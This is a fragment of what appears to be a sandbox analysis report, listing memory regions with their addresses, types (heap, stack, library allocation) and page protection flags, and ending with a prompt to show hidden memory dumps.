page read and write
|
||
|
7FFD9B7EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
62D000
|
heap
|
page read and write
|
||
|
702000
|
heap
|
page read and write
|
||
|
7FFD9B793000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B75E000
|
stack
|
page read and write
|
||
|
24A9000
|
trusted library allocation
|
page read and write
|
||
|
940000
|
trusted library allocation
|
page read and write
|
||
|
1300000
|
trusted library allocation
|
page read and write
|
||
|
1190000
|
heap
|
page execute and read and write
|
||
|
7FFD9B7BB000
|
trusted library allocation
|
page execute and read and write
|
||
|
E24000
|
heap
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B1000
|
stack
|
page read and write
|
||
|
611000
|
heap
|
page read and write
|
||
|
478000
|
heap
|
page read and write
|
||
|
35C4000
|
trusted library allocation
|
page read and write
|
||
|
15E0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page execute and read and write
|
||
|
1702000
|
heap
|
page read and write
|
||
|
1C780000
|
heap
|
page read and write
|
||
|
EB7000
|
heap
|
page read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1340000
|
trusted library allocation
|
page read and write
|
||
|
1B5D0000
|
heap
|
page read and write
|
||
|
422000
|
heap
|
page read and write
|
||
|
1340000
|
heap
|
page execute and read and write
|
||
|
7FFD9B7A1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
30AD000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
1710000
|
heap
|
page execute and read and write
|
||
|
7FFD9B793000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
261C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
|
1BDA9000
|
heap
|
page read and write
|
||
|
1390000
|
heap
|
page read and write
|
||
|
A02000
|
heap
|
page read and write
|
||
|
11CE000
|
stack
|
page read and write
|
||
|
6C0000
|
heap
|
page read and write
|
||
|
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
|
1288000
|
heap
|
page read and write
|
||
|
E51000
|
heap
|
page read and write
|
||
|
B91000
|
stack
|
page read and write
|
||
|
E78000
|
heap
|
page read and write
|
||
|
24B1000
|
trusted library allocation
|
page read and write
|
||
|
EAB000
|
heap
|
page read and write
|
||
|
24AF000
|
trusted library allocation
|
page read and write
|
||
|
1B28D000
|
stack
|
page read and write
|
||
|
1BBFE000
|
stack
|
page read and write
|
||
|
1343000
|
trusted library allocation
|
page read and write
|
||
|
2D00000
|
heap
|
page execute and read and write
|
||
|
EAD000
|
heap
|
page read and write
|
||
|
260F000
|
stack
|
page read and write
|
There are 511 hidden memdumps, click here to show them.